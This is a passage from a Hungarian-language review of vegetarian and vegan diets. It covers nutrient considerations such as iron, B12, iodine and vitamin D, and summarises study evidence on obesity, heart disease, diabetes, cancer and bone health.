belőlük készült termékeket sem). 1. ábra: a leggyakoribb növényi alapú étrendek. A vegetáriánus étrend bizonyos tápanyagok csökkentett bevitelének kockázatával jár, azonban ezek a hiányosságok könnyen elkerülhetők megfelelő tervezéssel. Étrend típusa Étrendi jellemző (mindegyik húsmentes) Vegetáriánus Tojást és tejterméket tartalmaz / nem tartalmaz. Lakto-ovo vegetáriánus Tejterméket és tojást is tartalmaz. Lakto-vegetáriánus Tejterméket tartalmaz, de tojást nem tartalmaz. Ovo vegetáriánus Tojást tartalmaz, de tejterméket nem tartalmaz Vegán Sem tojást, sem tejterméket nem tartalmaz, mézet tartalmazhat Nyers vegán Zöldségeken, gyümölcsö-kön, dióféléken, magva-kon, hüvelyeseken, és csíráztatott gabonákon alapuló étrend. A nyers ételek aránya 75 és 100% között változhat. 1. ábra, A vegetáriánus étrendek típusai. A VEGETÁRIÁNUS ÉTRENDEK ÁTTEKINTÉSE Vegetáriánus irányzatok Egy országos felmérés szerint 2016-ban körülbelül az amerikai felnőttek 3,3%-a volt vegetáriánus vagy vegán (soha nem eszik húst, tehát baromfit és halat sem), és körülbelül a vegetáriánusok 46%-a vegán1. Ugyanebből a felmérésből derült ki, hogy a fiatal felnőttek 6%-a (18-34 évesek) vegetáriánus vagy vegán, míg a 65 éves vagy annál idősebb korosztályban mindössze 2% ez az arány. A hús-helyettesítő termékek forgalma 2012-ben elérte az 553 millió dollárt, ez 8%-os növekedést jelent 2 év alatt. Megfigyelhető, hogy a válaszadók 36%-a főleg vegán húshelyettesítőket keresett, jellemzően a 18-44 éves korosztályból.1,2 Míg a teljes növényi élelmiszerek szolgáltatják a legjobb mindennapi táplálék-forrást, egyes feldolgozott és dúsított termékek, például a növényi alapú italok, húspótlók és reggeli gabonafélék, jelentős mértékben hozzájárulhatnak a vegetáriánusok tápanyagbeviteléhez. A növényi alapú étrend, beleértve a vegetáriánus és a vegán étrendet is, egyre elfogadottabbá válik, amint ezt sok nonprofit szervezet és kormányzati intézmény ajánlása is kiemeli. Az Amerikai Rákkutató Intézet a növényi alapú étrendeket ajánlja, valamint javasolja, hogy az amerikaiak táplálékának kétharmada zöldségekből, gyümölcsökből, teljes kiőrlésű gabonákból és babfélékből álljon.3 A 2015-2020-ra vonatkozó Amerikaiak Táplálkozási Iránymutatásában a vegetáriánus étrend a három ajánlott egészséges táplálkozási mód egyike és étkezési terveket biztosítanak lakto-ovo vegetáriánusok és vegánok számára is.4 A Nemzeti Iskolai Ebéd Program, bár nem írja elő a vegetáriánus lehetőség biztosítását, de előírja az iskoláknak a gyümölcsök, zöldségek és teljes kiőrlésű gabonák arányának növelését az iskolai menüben. Ezeken túl a vegetáriánus étrendnek technológiai támogatása is van. Ugyan még nincs kifejezetten vegetáriánusok számára készített online tápanyag-kiértékelő rendszer, de némelyik ilyen rendszer lehetővé teszi a vegetáriánus és vegán táplálkozási opció választását. Ezek a mobil alkalmazások segítenek a vegetáriánusoknak a táplálkozási igényeik felfedezésében, a tápanyag-bevitel értékelésében és vegán éttermek, üzletek megtalálásában, ahol számukra megfelelő ételek kaphatók. A www.SuperTracker.usda.gov címen működő rendszer például az Egyesült Államok Mezőgazdasági Minisztériuma ,,Choose My Plate programjának része.5 MEGFONTOLANDÓ SZEMPONTOK A VEGETÁRIÁNUSOK SZÁMÁRA Fehérje A vegetáriánus étrendek - tehát a vegán táplálkozás is - általában megfelelnek a javasolt fehérje-beviteli szükségleteknek, vagy meg is haladják azt, ha a kalóriabevitel megfelelő.6,7,8 A teljes értékű és nem teljes értékű kifejezések félrevezetőek a növényi fehérjét illetően. A nap folyamán elfogyasztott különböző növényi fehérjék megfelelő mennyiséget tartalmaznak minden nélkülözhetetlen (esszenciális) aminosavból, ha a kalóriabevitel megfelelő.7 Hüvelyesek és szója rendszeres fogyasztása biztosítja a megfelelő fehérjebevitelt és más alapvető tápanyagok bevitelét is. A fruitariánus (gyümölcs alapú) étrend fehérjéből és más tápanyagokból általában keveset tartalmaz. A kiegyensúlyozott vegetáriánus étrend minden élethelyzetben kielégíti a szervezet fehérjeszükségletét, még sportolók esetében is.7,8 n-3 zsírsavak Míg a vegetáriánusok és a vegánok alfa-linolénsav (ALA) bevitele hasonló a nem vegetáriánusokéhoz, addig a hosszú láncú n-3 zsírsavak – eikozapentaénsav (EPA) és dokozahexaénsav (DHA) - bevitele alacsonyabb a vegetáriánusoknál és jellemzően hiányzik a vegánoknál.10,11 A nem vegánokkal összehasonlítva a vegánok vérében és a szöveteiben az EPA és a DHA szintje jelentősen alacsonyabb.10,11 A csökkent EPA és DHA státusz klinikai jelentősége a vegetáriánusok és vegánok esetében ismeretlen.11,12 A hosszú láncú n-3 zsírsavak fontos szerepet játszanak az agy, a retina és a sejtmembránok kifejlődésében, fenntartásában, és kedvezően befolyásolják a terhesség kimenetelét, a szív- és érrendszeri betegségek (CVD) és más krónikus betegségek kezelését.6,13,14 Mégis, a vegetáriánus és vegán gyermekeknél, úgy tűnik, nem tapasztalható károsodás a vizuális vagy szellemi fejlődésben, illetve a vegetáriánus és vegán felnőttek esetében a CVD-vel kapcsolatos kockázat csökkenése tapasztalható.10,11,15 Az ALA endogén módon átalakul EPA-vá és DHA-vá, de a folyamat hatásfoka alacsony, és erősen függ a nemtől, az étrend összetételétől, az egészségi állapottól és az életkortól. Nagy mennyiségű linolsav (LA) bevitele akadályozhatja az ALA konverzióját.11,13 Az optimális konverzióhoz az LA/ALA arány lehetőleg ne haladja meg a 4:1 értéket.7,10,14 Az ALA javasolt napi bevitele (RDA) 1,6 g/nap férfiaknak és 1,1 g/nap nőknek.4 A biztonság kedvéért a vegetáriánusok és a vegánok számára előnyös ennél valamivel nagyobb ALA beviteli értékkel számolni.8,10 A leggazdagabb növényi n-3 zsírsav források a magvak (len, chia, gomborka, repce, és kender), a dió és az ezekből sajtolt olajok.8,10 A tények azt sugallják, hogy az egészséges emberek n-3-igényeit kielégítheti az ALA önmagában, illetve az EPA és a DHA endogén szintézise az ALA-ból elegendő ahhoz, hogy a szintek sok éven át stabilak legyenek.11,14 Alacsony dózisú mikroalga alapú DHA étrend-kiegészítők minden vegetáriánus számára elérhetők, hogy a megnövekedett igényeket (pl szoptatási időszak a nőknél) vagy a csökkent konverziós képességet (pl magas vérnyomás vagy cukorbetegség) ellensúlyozzák.10 Vas A vegetáriánusok vasbevitele általában azonos szintű vagy valamivel magasabb, mint a vegyes táplálkozásúaké.16 Annak ellenére, hogy a vas bevitele hasonló,17 a vegetáriánusok szervezete tipikusan kevesebb vasat raktároz, mint a nem vegetariánusoké. Az alacsonyabb szérum ferritin szint előnyt jelenthet, mert a szérum ferritin magas szintje önmagában növeli az anyagcsere zavarok kialakulásának kockázatát.18 A vegetáriánusok vasszintje miatti aggodalmak felvetették a növényi ételekben található nem hem vas biológiai hasznosíthatóságának kérdését. A nem hem vas abszorpciója a fiziológiai igényektől és részben a szervezet által raktározott vas mennyiségétől függ. A felszívódás nagyon változó a táplálék összetétele és a raktározott vas mennyisége függvényében. A nem hem vas biohasznosulását befolyásolják még felszívódást gátló tényezők, mint a fitátok és polifenolok illetve felszívódást segítő tényezők, mint a C-vitamin, a citromsav és egyéb szerves savak.19 Egy friss tanulmány kimutatta, hogy a nem hem vas felszívódása 1% és 23% között változott a szervezet vas-státuszától, illetve a felszívódást segítő és gátló tényezőktől függően.20 Egy újonnan kifejlesztett regressziós egyenlet lehetővé teszi a vasfelszívódás előrejelzését a szérumferritin szintje és a táplálékban lévő módosító tényezők alapján. A táplálék összetétele nagyobb hatást gyakorolt a vas felszívódására ha a szérumferritin szintje alacsony volt.20 A nem hem vas felszívódása akár 10-szer nagyobb lehet vashiányban szenvedőknél, mint a túl magas vasszinttel rendelkezőknél. Az RDA 2001-ben a vegetáriánusok számára 80%-kal több vasat írt elő, mint a nem vegetáriánusoknak. Ezt abból a feltételezésből vezették le, hogy a vegetáriánus étrendből származó vas felszívódása csak 10%-os míg a nem vegetáriánus étrendből származó vasé 18%-os.21 Ez a feltételezés nagyon korlátozott mennyiségű adat felhasználásával, egyszeri abszorpciós vizsgálatok, illetve a fejlett országok vegetáriánusaira nem jellemző táplálékok alapján készült. Ma már tudjuk, hogy a szervezet képes alkalmazkodni és képes sokkal hatékonyabban beépíteni a nem hem vasat.22 A vasfelszívódást elősegítő és csökkentő tényezők jelentősége idővel csökken.23 A szervezet alkalmazkodni tud az alacsony vasbevitelhez az idő múlásával, és képes a vasveszteséget is csökkenteni.24 Egy tanulmányban a vasabszorpció jelentősen, közel 40%-kal megnövekedett 10 hétig tartó alacsony vastartalmú diéta fogyasztása során.22 Az alacsony vasszinttel rendelkező emberek képesek lényegesen megnövelni a vasfelszívódás mértékét mérsékelt vagy magas vastartalmú ételek fogyasztása esetén. Úgy tűnik, hogy a fejlett országokban élő vegetáriánusoknál a felszívódási folyamat hatékonyan alkalmazkodik, mert a hemoglobinszintjük és a legtöbb vasszinttel kapcsolatos értékük hasonló a nem vegetáriánusokéhoz.7 Cink A tanulmányok azt mutatják, hogy a nem vegetáriánus kontrollcsoportokhoz képest a felnőtt vegetáriánusok étkezési cinkbevitele hasonló vagy valamivel alacsonyabb szintű, és a szérum-cinkkoncentrációjuk alacsonyabb, de a normál tartományon belül van.7,25 Az alacsonyabb cinkszintnek nem tulajdonítható káros következmény, valószínűleg a szervezet szabályozó mechanizmusainak köszönhetően, amelyek lehetővé teszik a vegetáriánus étrendhez való alkalmazkodást. Egyértelmű cinkhiány nem áll fenn a fejlett világ vegetáriánusai esetében. A népesség leginkább veszélyeztetett csoportjait (idősebbek, gyermekek, terhes és szoptató nők) illetően nincs elegendő adatunk arról, hogy a cink státusz alacsonyabb-e vegetáriánusoknál, mint a nem vegetáriánusoknál.25 A vegetáriánusok cinkforrásai: szójatermékek, hüvelyesek, gabonafélék, sajt, magvak és diófélék. Az olyan ételkészítési technikák, mint az áztatás és csíráztatás a babfélék, gabonák, diófélék és magvak esetében, valamint a kenyér kovászolása csökkenti a fitátok cinkkötő hatását, így növeli a cink felszívódását.26 Szerves savak, mint a citromsav, szintén növelhetik bizonyos mértékig a cinkabszorpciót.26 Jód A növényi alapú étrend jódban szegény lehet, így azok a vegánok, akik nem fogyasztanak kulcsfontosságú vegán jódforrásokat, például jódozott sót vagy tengeri zöldségeket, jódhiány veszélyének vannak kitéve.7,27 A tengeri zöldségek (tengeri algák, hínárok) jódtartalma nagyon változó és némelyik jelentős mennyiségű jódot tartalmazhat.28 A jódbevitel nem haladhatja meg a megengedett napi felső értéket, ami felnőttek esetében 1100 ug.29 Vegán nőknek várandósság idején további napi 150 ug jódra van szükségük.27,29 A tengeri só, a kóser só és a sós fűszerek, mint például a tamari, általában nem jódozottak,7 és a feldolgozott élelmiszerekben sem jódozott sót használnak. A tejtermékek tartalmazhatnak jódot, de a mennyiség erősen változó.7 Bár az olyan élelmiszerek, mint a szója, a keresztesvirágúak, illetve az édesburgonya tartalmaznak természetes goitrogént, ezek az ételek nem okoznak pajzsmirigy elégtelenséget egészséges emberekben, feltéve, hogy a jód bevitel megfelelő.7,8,29,30 Kalcium A lakto-ovo vegetáriánusok kalciumbevitele általában eléri vagy meghaladja az ajánlott értéket, míg a vegánok esetében ez nagyon változó, és néha az ajánlott érték alatt marad.7 A növényi kalcium biológiai hozzáférhetősége összefügg az élelmiszerek oxaláttartalmával, és kisebb mértékben a fitát- és a rosttartalommal is, ez nagyon fontos szempont. A felszívódás mértéke nagy oxaláttartalmú zöldségekből, például a spenótból, céklalevélből, mángoldból akár 5%-ig is csökkenhet. Így ezek nem tekinthetők jó kalciumforrásoknak, annak ellenére, hogy magas a kalciumtartalmuk. Összehasonlításképpen, a felszívódás alacsony oxalát tartalmú zöldségekből, mint a fodros kel, a tarlórépalevél, a kínai kel és a bordás kel, körülbelül 50%.31 A kalciummal dúsított (kalciumsóval készült) tofuból és a legtöbb kalciummal dúsított növényi tejből – a tehéntejhez hasonlóan kb 30% szívódik fel.32,33 Egyéb növényi élelmiszerek, például a fehérbab, a mandula, a tahini, a füge és a narancs, mérsékelt mennyiségű kalciumot tartalmaznak, valamivel alacsonyabb biohasznosulással (kb. 20%). Ehhez képest a kalciumtartalom dúsításához használt kalciumvegyületek közül a kalcium-citrát-malát biohasznosulása legalább 36%, míg más anyagoké kb. 30%.34 Regisztrált dietetikus táplálkozási szakértők (RDN) és regisztrált táplálkozási tanácsadók (NDTRs) segíteni tudnak a megfelelő kalciumbevitel elérésében a kalciumban gazdak ételek fogyasztásának hangsúlyozásával, szükség esetén alacsony dózisú táplálékkiegészítők alkalmazásával. D-vitamin A szervezet D-vitamin-szintje a napfényen töltött időtől és a D-vitaminban gazdag élelmiszerek vagy étrend-kiegészítők fogyasztásától függ.35 Napozás során a bőr által termelt D-vitamin mennyisége nagyon változó, nagyban függ a napszaktól, az évszaktól, a földrajzi szélességi foktól, a levegő szennyezettségétől, a bőr pigmentációjától, fényvédő krémek használatától, a napfénynek kitett bőrfelület nagyságától és az életkortól.35,36 Egyes vegetáriánusok és vegánok esetében beszámoltak alacsony D-vitamin-bevitelről, illetve alacsony plazma- vagy szérum- 25-hidroxi-D-vitamin-szintről, ez utóbbi különösen a télen vagy tavasszal vett vérmintáknál és különösen a magas földrajzi szélességen élők körében fordult elő.36 Étkezési és táplálékkiegészítő D-vitamin-források általában szükségesek a megfelelő D-vitamin-szint eléréséhez. D-vitaminnal dúsított élelmiszerek: a tehéntej, egyes növényi tejek, gyümölcslevek, reggeli gabonapelyhek és margarinok. A tojás is szolgáltathat némi D-vitamint. Ultraibolya fénnyel kezelt gombák jelentős D-vitamin-források lehetnek.36,37 Mind a D2-vitamint, mind a D3-vitamint használják táplálékkiegészítőként és élelmiszerek D-vitamin-tartalmának növelésére is. A D3-vitamin (kolekalciferol) lehet növényi vagy állati eredetű, míg a D2-vitamint (ergokalciferol) az élesztőből származó ergoszterin ultraibolya besugárzásával állítják elő. Alacsony adagokban a D2 és a D3-vitamin egyenértékű, de magasabb dózisokban a D2-vitamin kevésbé hatásosnak tűnik.36 Ha a napsugárzás és a D-vitaminnal dúsított élelmiszerek bevitele nem elegendő az igények kielégítésére, táplálékkiegészítő D-vitamin szedése ajánlott, különösen az idősebb felnőttek számára.35,36,38 Mivel a D-vitamin számos anyagcsere-folyamatot befolyásol a csontanyagcserén túl,35,38 egyes szakértők javasolják napi 1000-2000 NE vagy még több D-vitamin bevitelét. B12-vitamin A B12-vitamin nem található meg a növényi élelmiszerekben.7,39 Fermentált élelmiszerek (például a tempeh), nori (tengeri zöldség, hínár), spirulina, chlorella algák, és a nem dúsított sörélesztő-pehely nem tekinthető megbízható B12-forrásnak.39,40 Vegánoknak rendszeresen kell fogyasztaniuk megbízható B12-vitamin-forrást, azaz a B12-vitaminnal dúsított élelmiszert vagy B12-vitamin tartalmú táplálék-kiegészítőt - egyébként-vitaminhiányos állapot alakulhat ki, amint ezt vegán csecsemőkön, gyermekeken és felnőtteken végzett esettanulmányok mutatják.8,39 A legtöbb vegetáriánusnak is bele kellene illesztenie ezeket a megbízható B12 forrásokat az étrendjébe, mert naponta 1 pohár tej és egy tojás csak körülbelül a kétharmadát fedezi az ajánlott napi bevitelnek (RDA).7,39,40 A súlyos B12-hiány korai tünetei a fáradékonyság, bizsergés a kéz- vagy lábujjakban, a rossz mentális állapot, a rossz emésztés és az elégtelen fejlődés kisgyermekeknél. Csekély mértékű B12-hiány magas homocisztein-szintet eredményez. Alacsony B12-bevitel vagy a B12-bevitel teljes hiánya mellett is egészségesnek érezheti magát valaki, de hosszú távon már a kis fokú hiány is sztrókhoz, demenciához és a csontok rossz állapotához vezethet.7,8,41 A B12-vitamin-szint mérésére alkalmas laboratóriumi vizsgálatok: a szérum metil-malonsav-tartalmának, a szérum vagy a plazma B12-szintjének és a szérum holo-transzkobalamin-tartalmának (Holo-TC vagy Holo-TCII) mérése.8,39,41 A B12-felszívódás normál mechanizmusa az úgynevezett belső tényező (intrinszik faktor, a gyomornedv antianaemiás faktora) révén történik, amely körülbelül az RDA felénél telítődik, és a szervezet csak 4 – 6 óra múlva képes további felszívásra.40 Ezért a dúsított ételeket legjobb két részre osztva fogyasztani a nap folyamán. Egy másik abszorpciós mechanizmus, a passzív diffúzió 1%-os hatékonysággal teszi lehetővé a nagy dózisú B12-t tartalmazó táplálék-kiegészítők ritkább fogyasztását. Az ajánlásokat nagy dózisok alapján állapították meg (pl. 500 – 1000 ug cianokobalamin hetente több alkalommal).8,39 A B12-vitaminnak négy formáját ismerjük, melyek a kobalaminhoz kapcsolódó csoportokban különböznek egymástól. A ciano-kobalamin a leggyakrabban használt forma a dúsított élelmiszerekben és táplálék-kiegészítőkben, nagy stabilitása miatt. A metil-kobalamin és az adenozil-kobalamin a szervezet enzimatikus reakcióiban szereplő formák, ezek táplálék-kiegészítőként kaphatók. A tapasztalatok azt mutatják, hogy nem hatékonyabbak, mint a ciano-kobalamin, az ajánlott napi értéknél nagyobb dózisra lehet belőlük szükség. A hidroxi-kobalamin injekciókban alkalmazható hatékonyan.8,42 VEGETÁRIÁNUS ÉTREND A TERÁPIÁBAN ÉS A KRÓNIKUS BETEGSÉGEK Ha a táplálkozási oktatás megfelelő, a terápiás vegetáriánus étrend ugyanolyan jól betartható, mint a vegyes étrend.43 Motivációs interjúkkal, gyakori megbeszéléssel, főzési bemutatókkal és további ösztönző stratégiák alkalmazásával tovább javítható a vegetáriánus étrend terápiás használatának eredménye, ahogyan más terápiás étrendeknél ezt megszokhattuk. Túlsúly és elhízás Az amerikai népesség több mint kétharmada - és egyre növekvő hányada – túlsúlyos vagy elhízott.44 A dietetikusnak ismernie kell azt a tényt, hogy a vegetáriánus és vegán táplálkozás elősegíti az egészséges testsúly elérését és fenntartását. Az egészséges testsúly összefügg a szív és érrendszeri funkciók javulásával,45 az inzulinérzékenységgel,46 valamint segít csökkenteni más krónikus betegségek kockázatait is.45 A növényi alapú táplálkozás összefügg az alacsony testtömeg-indexszel is (BMI, kg/m2-ben). A második Adventista Egészségügyi Tanulmányban (Adventist Health Study-2), az átlagos BMI a húsevőknél volt a legmagasabb (28,8), és azoknál volt a legalacsonyabb, akik elkerülik az összes állati terméket (23,6).47 Hasonlóképpen, a EPIC-Oxford tanulmányban, a kutatók a legmagasabb átlagos BMI-t a húsevőknél (24,4) és a legalacsonyabbat a vegánoknál (22,5) mérték.48 A svéd Mammográfia kohorsztanulmányban a kutatók megállapították, hogy a túlsúly vagy az elhízás előfordulása a mindenevőknél 40%, a vegetáriánusoknál 25%.49 A kutatások azt mutatják, hogy a vegetáriánus étrend hatékonyan használható a túlsúly kezelésére és jobb alternatíva, mint a hasonló céllal összeállított mindenevő étrend. Beavatkozásos kísérletek két metaanalízise azt mutatta ki, hogy a vegetáriánus étrend alkalmazása nagyobb súlycsökkenéssel jár a kontroll csoportokhoz képest.50,51 A vegán étrend strukturált csoporttámogatással és viselkedési terápiával jelentősen nagyobb testsúly-csökkenést eredményezett, mint a Nemzeti Koleszterin Oktatási Program által összeállított étrend52 az egy- illetve kétéves vizsgálati időszak alatt. Szív és érrendszeri betegségek (CVD), beleértve a hiperlipidémiát, az iszkémiás szívbetegséget, és a magas vérnyomást A vegetáriánus étrendek a CVD kockázatának csökkenésével járnak.15,53 A vegetáriánus étrendek számos szívbetegség kockázati tényezőn javítanak, például a hasi elhízáson,54 a magas vérnyomáson,55 a szérum lipidprofiján,56 és a vércukor szinten.42,57 Szintén csökkentik a gyulladásos markereket, mint például a C-reaktív proteint, az oxidatív stressz, és védenek az ateroszklerotikus plakkok képződésével szemben.58 Következésképpen, a vegetáriánusok esetében csökken az iszkémiás szívbetegség kialakulásának, és az általa okozott halálnak a kockázata.15,53,59 A vegán étrend a legkedvezőbb a szívbetegségek kockázati faktorainak csökkentésében.55,57 Az EPIC-Oxford tanulmányból60 kiderült, hogy a növényi táplálkozást követők fogyasztották a legtöbb rostot, a legkevesebb zsírt, illetve telített zsírt, és nekik volt a legegészségesebb testtömegük és koleszterinszintjük a mindenevőkkel és más vegetáriánusokkal összehasonlítva. Tizenegy randomizált, kontrollcsoportos vizsgálat metaanalízise kimutatta, hogy a vegetáriánusoknál a teljes koleszterinszint, az LDL- és a HDL-koleszterin-szint oly módon csökkent, ami a szívbetegségek kockázatában körülbelül 10%-os csökkenésnek felel meg.56 A vegetáriánus étrend különösen előnyös volt az egészséges testsúlyú és a túlsúlyos emberek esetében, de kevésbé hatékony az elhízottak számára, ezért kiemelten fontos a korai étrendi beavatkozás a hosszú távú kockázatcsökkentés érdekében.56 A második Adventista Egészségügyi Tanulmányban 73308 hetednapi adventista vizsgálata alapján a kutatók azt állapították meg, hogy a vegetáriánusoknál 13%-kal csökkent a CVD és 19%-kal az iszkémiás szívbetegség kialakulásának kockázata a nem vegetáriánusokkal összehasonlítva.15 Az EPIC tanulmány egy korábbi elemzése szerint a vegetáriánusoknál 32%-kal alacsonyabb a szívbetegség miatti kórházi kezelés és a szívbetegség miatti halál kockázata.53 A vegetáriánusok esetében azért kisebb a szívbetegségek kockázata, mert rendszeresen fogyasztanak különféle zöldségeket, gyümölcsöket, teljes kiőrlésű gabonaféléket, hüvelyeseket és dióféléket. A kevés zsiradékot tartalmazó vegán és vegetáriánus étrend egyéb pozitív életmódbeli tényezőkkel társulva - mint a dohányzás mellőzése és a testsúly csökkentése - bizonyítottan az atheroszklerózis (érelmeszesedés) visszafejlődését eredményezi.61 A szívkoszorúér-betegségek kockázati tényezői, például a teljes koleszterin és az LDL-koleszterin, a testsúly és a testzsír rövid időn belül javulnak vegetáriánus diéta mellett, még koleszterinszint-csökkentő gyógyszerek használata nélkül is.61 A vegetáriánusok körében ritkábban fordul elő a magas vérnyomás a nem vegetáriánusokhoz képest. Az EPIC-Oxford tanulmány eredményei kimutatták, hogy a vegánoknak a legalacsonyabb a szisztolés és diasztolés vérnyomásuk, és náluk a legalacsonyabb a magas vérnyomás előfordulása az összes táplálkozási csoport közül (vegánok, vegetáriánusok, halevők és húsevők).62 A második Adventista Egészségügyi Tanulmány adatai szintén megerősítették, hogy a vegánoknak a legalacsonyabb a vérnyomásuk, és minden vegetáriánus csoport közül itt vannak legkevesebben a magas vérnyomásban szenvedők, lényegesen alacsonyabb a számuk, mint a húsevők között.55 Egy metaanalízis - amely több mint 21 000 ember vérnyomását hasonlította össze a világon - arra a következtetésre jutott, hogy a vegetáriánusok szisztolés vérnyomása körülbelül 7 Hgmm-rel, a diasztolés vérnyomásuk pedig 5 Hgmm-rel alacsonyabb, mint a vegyes táplálkozású népességé.63 Cukorbetegség A húsevőkkel összehasonlítva a lakto-ovo-vegetáriánusoknál és a vegánoknál kisebb a 2-es típusú cukorbetegség kockázata. A második Adventista Egészségügyi Tanulmányról szóló beszámoló szerint a húsevők között több mint kétszer annyi cukorbeteg van, mint a lakto-ovo- vegetáriánusok és a vegánok között, még a BMI-vel való korrekció után is.47 A tanulmány azt is megállapította, hogy már a cukorbetegség kialakulásának esélye is 77%-kal csökkent a vegánok esetében, és 54%-kal a lakto-ovo-vegetáriánusok esetében a nem vegetáriánusokhoz képest (életkor szerinti korrekció után). Amikor a BMI-t és egyéb befolyásoló tényezőket is figyelembe vették, az összefüggés továbbra is erős maradt. A vegánoknál 62%-kal kisebb valószínűséggel alakul ki cukorbetegség, míg a lakto-ovo-vegetáriánusok körében 38%-kal kisebb ez a valószínűség.64 Megelőzés Az elmúlt két évtizedben prospektív megfigyeléses tanulmányok és klinikai vizsgálatok jelentős bizonyítékokat szolgáltattak arra, hogy a teljes kiőrlésű gabonákban, gyümölcsökben, zöldségekben, hüvelyesekben, magvakban és diófélékben gazdag, viszont finomított gabonafélékben, vörös vagy feldolgozott húsokban és cukorral édesített italokban szegény étrend csökkenti a cukorbetegség kockázatát, javítja a glikémiás kontrollt és a vérlipidek kontrollját cukorbetegségben szenvedőknél.65 A teljes kiőrlésű gabonák fogyasztása szorosan összefügg a cukorbetegség kisebb kockázatával, még a BMI figyelembevétele után is.66 A hüvelyesek, amellett, hogy alacsony glikémiás indexű élelmiszerek, azért is előnyösek a cukorbetegek számára, mert csökkentik az étkezés utáni glükózszintet, sőt a következő étkezés utáni glükózszintet is, ez az úgynevezett ,,második étkezés effektus.67 Egy metaanalízis azt bizonyította, hogy a magasabb gyümölcs- vagy zöldségbevitel, különösen a zöld zöldségek fogyasztása a 2-es típusú cukorbetegség kockázatát jelentősen csökkenti.68 Az első és második ,,Ápolók Egészségügyi Tanulmányában a csonthéjasok, különösen a dió fogyasztása csökkentette a cukorbetegség kockázatát.69 Ezzel szemben a vörös és a feldolgozott húsok erősen növelték az éhomi glükóz- és inzulinkoncentrációt és a cukorbetegség kockázatát.70 A hús és a cukorbetegség összefüggésének lehetséges okai többek között a telített zsírsavak, a késői glikációs végtermékek, a nitrátok/nitritek, a hem vas, a trimetil-amin-N-oxid, az elágazó szénláncú aminosavak és az endokrin diszruptor vegyi anyagok.70 Kezelés. Randomizált klinikai vizsgálatokban az alacsony zsírtartalmú vegán étrend az Amerikai Diabétesz Egyesület iránymutatásai alapján összeállított étrenddel összehasonlítva jobb eredményt hozott a glikémiás kontroll, a vérlipidek és a testtömegkontroll terén is.71 2-es típusú cukorbetegek 24 hetes randomizált kontrollos vizsgálatában az izokalorikus vegetáriánus étrendet követő csoport jobb eredményeket ért el inzulinérzékenység, a zsigeri zsír csökkenése és a gyulladásos markerek csökkenése terén, mint a hagyományos diabetikus diétát követők.72 Hat kontrollos klinikai vizsgálat metaanalízise szerint a vegetáriánus étrend a glikémiás kontroll javulásával jár együtt a 2-es típusú cukorbetegségben szenvedőknél.73 A tápanyagban gazdag, magas rosttartalmú növényi ételekből összeállított vegetáriánus és vegán étrend csökkenti a 2-es típusú cukorbetegség kockázatát, és hatékony terápiás eszköz a 2-es típusú cukorbetegség kezelésére. Rák A második Adventista Egészségügyi Tanulmány kimutatta, hogy a vegetáriánus étrend összességében alacsonyabb rákkockázattal társul, különösen az emésztőrendszeri rákok tekintetében. Továbbá, a vegán étrend, úgy tűnik, nagyobb védelmet nyújt a rák előfordulása ellen, mint bármely más étrendi minta.74 Legutóbb arról számoltak be, hogy a vegán étrend 35%-kal csökkenti a prosztatarák kockázatát.75 Hét tanulmány metaanalízise azt az eredményt hozta, hogy a vegetáriánusok között 18%-kal kisebb a rákos megbetegedések előfordulása, mint a nem vegetáriánusoknál.59 Epidemiológiai vizsgálatok egyértelműen kimutatták, hogy gyümölcsök, zöldségek, hüvelyesek vagy a teljes kiőrlésű gabonák rendszeres fogyasztása bizonyos rákos megbetegedések kockázatát csökkenti.76 A zöldségfélékben, a hüvelyesekben, a gyümölcsökben, a fűszerekben és a teljes kiőrlésű gabonafélékben található fitokemikáliák hatalmas sokasága, mint például a szulforapán, ferulinsav, genisztein, indol-3-karbinol, kurkumin, epigallokatekin-3-gallát, diallil-diszulfid, rezveratrol, likopin és a kvercetin, védelmet nyújthat a rák ellen.77,78 Ezekről a fitokemikáliákról tudjuk, hogy beavatkoznak számos sejtszintű folyamatba, amely szerepet játszik a rák kialakulásában.79 A vegetáriánusok általában több rostot fogyasztanak az egyéb étrendek követőivel összehasonlítva. A tíz európai ország bevonásával készült EPIC tanulmány megállapította, hogy a legtöbb rostot tartalmazó étrend esetében 25%-kal csökkent a kolorektális (vastagbél és végbél) rák kockázata a legkevésbé rostos étrendhez képest.80 Másrészt, két nagy amerikai kohorsztanulmányban egyértelmű kapcsolatot figyeltek meg a feldolgozott vörös húsok fogyasztása és a kolorektális rák között.81 Azt is láttuk, hogy a feldolgozott húsok fogyasztása növeli a rákkal összefüggő halálozás kockázatát.82 Huszonhat epidemiológiai tanulmány szisztematikus áttekintése és metaanalízise azt mutatta, hogy napi 100 g vörös hús fogyasztása esetén a kolorektális mirigyhámból kiinduló jóindulatú daganatok (adenómák) kialakulásának relatív kockázata 1,27, illetve napi 50 g feldolgozott hústermék fogyasztása estén a relatív kockázat 1,29.83 Csontritkulás Csontokról készült tanulmányok arról számoltak be, hogy a vegetáriánusok csontjának ásványianyag-sűrűsége hasonló a vegyes táplálkozásúakéhoz, vagy kissé elmarad attól, míg a legalacsonyabb érték jellemzően a vegánoké.84 Mivel a különbségek viszonylag csekélyek, úgy tűnik, ennek nincs klinikai jelentősége, feltéve, hogy a kritikus tápanyagok megfelelően biztosítottak. A vegetáriánus étrendek számos tényezővel társulnak, amelyek elősegítik a csontot egészségét, beleértve a nagy mennyiségű zöldség és gyümölcs fogyasztását; a bőséges magnézium-, kálium-, K-vitamin és C-vitamin-bevitelt, valamint a viszonylag alacsony savterhelést.36 Ezzel szemben veszélyeztetheti a csontok egészségét, ha az étrendben kevés a kalcium, a D-vitamin, a B12-vitamin és a fehérje.36 Az EPIC-Oxford tanulmány 30%-kal nagyobb csonttörési kockázatot jelzett a vegánok csoportjára, de a lakto-ovo-vegetáriánusok esetében nincs eltérés a nem vegetáriánusokhoz képest. Ha azonban csak azokat a vegánokat szerepeltettük az elemzésben, akiknek a kalciumbevitele meghaladja az 525 mg-ot, a törési kockázat különbsége eltűnt.84 Az második Adventista Egészségügyi Tanulmány arról számolt be, hogy a hüvelyesek és húsanalógok gyakori fogyasztása hatékonyabban csökkenti a csípőcsonttörés kockázatát, mint a húsfogyasztás.85 A fehérje a csontok egészsége szempontjából semleges vagy enyhén pozitív hatású.36 A D- és B12-vitaminok elégtelen bevitele összefügg a csontok alacsony ásványianyag-sűrűségével, a csonttörés megnövekedett esélyével és a csontritkulással.36 Acsontok kiváló egészségének elérése és fenntartása érdekében a vegetáriánusok és vegánok számára erősen ajánlott a javasolt napi beviteli értékek betartása minden tápanyagból, különösen kalciumból, D-vitaminból, B12-vitaminból és fehérjéből, valamint nagy adag zöldség és gyümölcs rendszeres fogyasztása.36 